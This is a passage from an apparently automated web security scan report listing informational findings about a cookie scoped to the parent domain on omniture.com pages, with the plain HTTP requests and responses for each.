User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:54:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:54:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cms_site_lang=6; expires=Sat, 05-Mar-2011 05:54:42 GMT; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:54:42 GMT; path=/; domain=omniture.com
Content-Length: 39109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//jp" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="jp" lang="jp">
<head>
<title>Omniture - ....................
...[SNIP]...

11.436. http://www.omniture.com/ko previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/ko

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:56:23 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ko HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:56:23 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:56:23 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:56:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cms_site_lang=11; expires=Sat, 05-Mar-2011 05:56:23 GMT; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:56:23 GMT; path=/; domain=omniture.com
Content-Length: 36389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//ko" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="ko" lang="ko">
<head>
   <title></title>

   <meta http-equiv="C
...[SNIP]...

11.437. http://www.omniture.com/offer/100 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/100

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:31 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/100 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:31 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:31 GMT
Content-Length: 13429
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:31 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Marketer's Segmentation
...[SNIP]...

11.438. http://www.omniture.com/offer/101 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/101

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/101 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:26:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:26:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:26:42 GMT
Content-Length: 14068
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>7 Steps to Increasing Website C
...[SNIP]...

11.439. http://www.omniture.com/offer/102 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/102

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:57 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/102 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:24:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:24:57 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:24:57 GMT
Content-Length: 13704
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:57 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>7 Advanced Steps to Effective S
...[SNIP]...

11.440. http://www.omniture.com/offer/107 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/107

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/107 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:19 GMT
Content-Length: 13851
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>BabyCenter: 67% Increase in Con
...[SNIP]...

11.441. http://www.omniture.com/offer/108 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/108

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:34 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/108 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:26:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:26:34 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:26:34 GMT
Content-Length: 14378
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:34 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Lastminute.com Achieves a 28% I
...[SNIP]...

11.442. http://www.omniture.com/offer/158 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/158

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:27:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/158 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:27:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:27:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:27:55 GMT
Content-Length: 13637
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:27:55 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Defining the Online Marketing S
...[SNIP]...

11.443. http://www.omniture.com/offer/162 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/162

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:27:57 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/162 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:27:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:27:57 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:27:57 GMT
Content-Length: 13965
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:27:57 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>How to Exponentially Increase C
...[SNIP]...

11.444. http://www.omniture.com/offer/17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/17

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:19 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/17 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:19 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:19 GMT
Content-Length: 15402
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:19 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>3 Proven Approaches to Deliveri
...[SNIP]...

11.445. http://www.omniture.com/offer/170 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/170

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:33 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/170 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:26:33 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:26:33 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:26:33 GMT
Content-Length: 13945
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:33 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture SiteCatalyst 14: Actio
...[SNIP]...

11.446. http://www.omniture.com/offer/186 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/186

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:26 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/186 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:26 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:26 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:26 GMT
Content-Length: 13697
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:26 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Discover: A New Dimens
...[SNIP]...

11.447. http://www.omniture.com/offer/187 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/187

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/187 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:24:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:24:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:24:44 GMT
Content-Length: 14318
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:44 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture SearchCenter: Automate
...[SNIP]...

11.448. http://www.omniture.com/offer/191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/191

